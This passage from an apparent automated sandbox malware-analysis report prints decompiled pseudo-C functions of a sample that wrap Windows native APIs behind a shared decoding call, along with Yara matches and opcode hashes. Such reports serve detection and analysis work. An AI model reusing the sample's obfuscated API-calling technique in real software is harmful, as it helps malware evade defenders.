                    • Instruction Fuzzy Hash: 7801A4B2201108AFDB08DF89DC85EEB77ADAF8C754F158248FA1DA7245C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 276 41a360-41a3b1 call 41af60 NtCreateFile
                    C-Code - Quality: 100%
                    			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                    0x0041a36f
                    0x0041a377
                    0x0041a3ad
                    0x0041a3b1

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 286 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                    C-Code - Quality: 100%
                    			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                    0x0041a54f
                    0x0041a557
                    0x0041a579
                    0x0041a57d

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("in al, dx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                    0x0041a492
                    0x0041a493
                    0x0041a496
                    0x0041a49f
                    0x0041a4a7
                    0x0041a4b5
                    0x0041a4b9

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A492 Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0041A492() {
				long _t8;
				void* _t11;
				void* _t15;

				asm("in al, dx");
				_t5 =  *((intOrPtr*)(_t15 + 8));
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11,  *((intOrPtr*)(_t15 + 8)), _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose( *(_t15 + 0xc)); // executed
				return _t8;
			}






                    0x0041a492
                    0x0041a493
                    0x0041a496
                    0x0041a49f
                    0x0041a4a7
                    0x0041a4b5
                    0x0041a4b9

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
                    • Instruction ID: 48b49b566feccc7395fab601ee09e747f17eca396881e47cc366dec35a54d8cc
                    • Opcode Fuzzy Hash: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
                    • Instruction Fuzzy Hash: 5BD05E76200214BFD710EFA8CC85FE77B68EF48764F158599BA1CDB242C530E61187E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3239b010a517ae40c39989a472c856095933ce27151883d65057674f9f025466
                    • Instruction ID: d96c964cd511ebdd271d0b973c03eec6a722885d52ea0dec6f8183f1343b07e2
                    • Opcode Fuzzy Hash: 3239b010a517ae40c39989a472c856095933ce27151883d65057674f9f025466
                    • Instruction Fuzzy Hash: 109002B121100403D180759948457870009E7D0345F51C021A5054954EC7999DD577A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 573c5fe5cc8eb0c9acfd80535cc3e0e5741fb401fed3c175a4c502ca17f63971
                    • Instruction ID: b64cd72d70ee5e4f4528f812434b5623dc038f3cb9610dd94fc55526c4d65609
                    • Opcode Fuzzy Hash: 573c5fe5cc8eb0c9acfd80535cc3e0e5741fb401fed3c175a4c502ca17f63971
                    • Instruction Fuzzy Hash: E59002A135100443D14065994855B470009E7E1345F51C025E1054954DC759DC927266
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9294f8a18fdf9362bdfa573f0a9a16a1d4f42ca7fd8c9ed6f2a65b1ebead2929
                    • Instruction ID: b7eaff33ec0aab5ece2fb27e8506ab848efb2a570335bae389e37707506b3a88
                    • Opcode Fuzzy Hash: 9294f8a18fdf9362bdfa573f0a9a16a1d4f42ca7fd8c9ed6f2a65b1ebead2929
                    • Instruction Fuzzy Hash: 8290027121100413D15165994945747000DE7D0285F91C422A0414958DD7969992B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 902a07ca2a43731c111d0ef687cc7140b9c1d0832a7aff773dd3c5c376e966ea
                    • Instruction ID: d0bc6682ac18b2dda1958e213915b0b5d7009237e3235c1de8140c63c06e278a
                    • Opcode Fuzzy Hash: 902a07ca2a43731c111d0ef687cc7140b9c1d0832a7aff773dd3c5c376e966ea
                    • Instruction Fuzzy Hash: EE900261252041535585B5994845547400AF7E0285791C022A1404D50CC666A896E761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b3198994c1ccc11ef7358a3133b50db2c50ec92a5e8eac0ea9ee199894b050dd
                    • Instruction ID: 1e255866d66d2f0544bb9bad74ed2cf19b6e8eaf1018a0ca8a7542f9574faf82
                    • Opcode Fuzzy Hash: b3198994c1ccc11ef7358a3133b50db2c50ec92a5e8eac0ea9ee199894b050dd
                    • Instruction Fuzzy Hash: 1790026161100503D14175994845657000EE7D0285F91C032A1014955ECB6599D2B271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: e81b38ef9460d2cecd0745e7bfbd3f9b2c074e9e5b130956c08a49abf5a0f7a8
                    • Instruction ID: 4bdde2b3e1e344ed386e7dcb36f57b0e6e074976f79953fba21264e5ac8e6e47
                    • Opcode Fuzzy Hash: e81b38ef9460d2cecd0745e7bfbd3f9b2c074e9e5b130956c08a49abf5a0f7a8
                    • Instruction Fuzzy Hash: D090026122180043D24069A94C55B470009E7D0347F51C125A0144954CCA5598A16661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 237fb2dd592409c72f7c988562d78f71d085d3d115c8937b02fddb01a7ac982c
                    • Instruction ID: 9f4ec9b7fb25ebbae4139d4defd78cecf96cc5ed391843fefcb464a56eb3854e
                    • Opcode Fuzzy Hash: 237fb2dd592409c72f7c988562d78f71d085d3d115c8937b02fddb01a7ac982c
                    • Instruction Fuzzy Hash: 8090026161100043418075A98C859474009FBE1255751C131A0988950DC69998A567A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 23d65aaeb6c9e3a430e2de20823d6dcd5959508a6180271b038881eff4f12143
                    • Instruction ID: 4386063ca43b90b05b12dcb0af3dd042d4f9bce5d5d5d9c919550dc61cef62a6
                    • Opcode Fuzzy Hash: 23d65aaeb6c9e3a430e2de20823d6dcd5959508a6180271b038881eff4f12143
                    • Instruction Fuzzy Hash: D590027121140403D14065994C5574B0009E7D0346F51C021A1154955DC765989176B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 79df2762840c57ce3f6fcc11d73dcffd9282c80831bb1ab6d1e16a3245377bb5
                    • Instruction ID: d3dffbcf54a9b0be95810515368c24ee7aa04bba1dfe39d430b3ab95010270f7
                    • Opcode Fuzzy Hash: 79df2762840c57ce3f6fcc11d73dcffd9282c80831bb1ab6d1e16a3245377bb5
                    • Instruction Fuzzy Hash: 4D900265221000030145A9990B45547004AE7D5395351C031F1005950CD76198A16261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5af70728be622b7f581b1aa1e533cf6f0edd8eab0911ab13a0c1a06c82854a54
                    • Instruction ID: bc3fe77c35a465461ac61817158811cf456fd7478f2c319b3c2df298d5168c3d
                    • Opcode Fuzzy Hash: 5af70728be622b7f581b1aa1e533cf6f0edd8eab0911ab13a0c1a06c82854a54
                    • Instruction Fuzzy Hash: E59002A121200003414575994855657400EE7E0245B51C031E1004990DC66598D17265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0feb39b9a678568e7ad36ea54c2cd420cf64bfb7eaa7fe96e1abb8721d0fd41f
                    • Instruction ID: de9b90e5b9c828bc4c4adbebb725ae91247d54b19a4ed708d82fa5b5ef3d5c59
                    • Opcode Fuzzy Hash: 0feb39b9a678568e7ad36ea54c2cd420cf64bfb7eaa7fe96e1abb8721d0fd41f
                    • Instruction Fuzzy Hash: 1990027121100403D14069D958496870009E7E0345F51D021A5014955EC7A598D17271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7701d161b29f16ee63530723d246657c83c86fa11975ebdd74be370661a767b9
                    • Instruction ID: 5702c9e67f3d1e937f2c3305ab235d35135c31a05535b40e6e0af5f69b1bff0a
                    • Opcode Fuzzy Hash: 7701d161b29f16ee63530723d246657c83c86fa11975ebdd74be370661a767b9
                    • Instruction Fuzzy Hash: 4A90026131100003D180759958596474009F7E1345F51D021E0404954CDA5598966362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 04fa3500e35509976428da2b0ff2031424b80075e7adb16ff6bce0f2acc85c69
                    • Instruction ID: 9c37dd04d02087b410b41422f7fb7d3e10aa8f734c9f0a7b0abd70c263869d2b
                    • Opcode Fuzzy Hash: 04fa3500e35509976428da2b0ff2031424b80075e7adb16ff6bce0f2acc85c69
                    • Instruction Fuzzy Hash: 0D90026922300003D1C07599584964B0009E7D1246F91D425A0005958CCA5598A96361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 978fa87c313c221ecd44db8ca73a5cf267008fa8a430902a378081c8a93dc8a9
                    • Instruction ID: 2e718fe77e8d3d6177012d9b5ff31badce087cc361607ed20375962db226343a
                    • Opcode Fuzzy Hash: 978fa87c313c221ecd44db8ca73a5cf267008fa8a430902a378081c8a93dc8a9
                    • Instruction Fuzzy Hash: FA90027121100803D1C07599484568B0009E7D1345F91C025A0015A54DCB559A9977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c5bbb83c9943d011914914acd30f9867212c4a6e0d0098117d8b32dd3f9e836e
                    • Instruction ID: 0c98bbab7be258597fb156a769df11e2e01e23ca6c5b66aa26b6273da43f30b2
                    • Opcode Fuzzy Hash: c5bbb83c9943d011914914acd30f9867212c4a6e0d0098117d8b32dd3f9e836e
                    • Instruction Fuzzy Hash: D390027121108803D1506599884578B0009E7D0345F55C421A4414A58DC7D598D17261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00409AB0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                    0x00409abb
                    0x00409ac3
                    0x00409ac5
                    0x00409aca
                    0x00409acf
                    0x00409ae2
                    0x00409ae7
                    0x00409af0
                    0x00409afc
                    0x00409b0f
                    0x00409b14
                    0x00409b17
                    0x00409b20
                    0x00409b32
                    0x00409b37
                    0x00409b3c
                    0x00000000
                    0x00000000
                    0x00409b3e
                    0x00409b42
                    0x00000000
                    0x00000000
                    0x00409b44
                    0x00000000
                    0x00409b42
                    0x00409b46
                    0x00409b49
                    0x00409b4f
                    0x00409b51
                    0x00409b5c
                    0x00409b61
                    0x00409b64
                    0x00409b71
                    0x00409b7c
                    0x00409b7e
                    0x00409b84
                    0x00409b88
                    0x00409b8b
                    0x00409b8b
                    0x00409b92
                    0x00409b95
                    0x00409b9a
                    0x00409ba7
                    0x00409ad6
                    0x00409ad6
                    0x00409ad6

                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A775 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 34%
                    			E0041A775(intOrPtr* __eax, void* __edx, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36) {
				int _t19;
				void* _t25;
				void* _t36;
				void* _t37;
				intOrPtr* _t40;
				void* _t44;

				_t1 = __edx + __eax;
				 *_t1 =  *(__edx + __eax) << 0x89;
				asm("aad 0x3a");
				_pop(_t44);
				if( *_t1 != 0) {
					asm("sbb [edx], cl");
					 *__eax =  *__eax + __eax;
					_push(_t37);
					E0041AF60(_t36, __eax, __eax + 0xc8c, _t25, 0, 0x46);
					_t19 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
					return _t19;
				} else {
					asm("sbb [ebp-0x75], dl");
					_t20 = _a12;
					_t5 = _t20 + 0xc88; // 0xd8c
					_t40 = _t5;
					E0041AF60(_t36, _a12, _t40, _a12[0x50a], 0, 0x39);
					_t6 =  &_a36; // 0x410a2e
					return  *((intOrPtr*)( *_t40))(_a16, _a20, _a24, _a28, _a32,  *_t6, _t37, _t44);
				}
			}









                    0x0041a776
                    0x0041a776
                    0x0041a77a
                    0x0041a77c
                    0x0041a77d
                    0x0041a7d8
                    0x0041a7da
                    0x0041a7dc
                    0x0041a7ea
                    0x0041a800
                    0x0041a804
                    0x0041a77f
                    0x0041a77f
                    0x0041a783
                    0x0041a792
                    0x0041a792
                    0x0041a79a
                    0x0041a79f
                    0x0041a7c0
                    0x0041a7c0

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID: .AP
                    • API String ID: 3899507212-3996626295
                    • Opcode ID: 693b81085a6e6a0a407761b6877ac5d39d8b98da8d9dec14e598f0b4d6cb56f8
                    • Instruction ID: 1557a1216e0e588b710f1af5d7e977c0e1cc598010e38422b109feb866c11a0d
                    • Opcode Fuzzy Hash: 693b81085a6e6a0a407761b6877ac5d39d8b98da8d9dec14e598f0b4d6cb56f8
                    • Instruction Fuzzy Hash: 8211A1B52002486FCB11DF69DC41EEB3BA8EF89764F15828AF90C97242C530E815CBB4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 19 41a630-41a661 call 41af60 RtlAllocateHeap
                    C-Code - Quality: 100%
                    			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                    0x0041a647
                    0x0041a652
                    0x0041a65d
                    0x0041a661

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
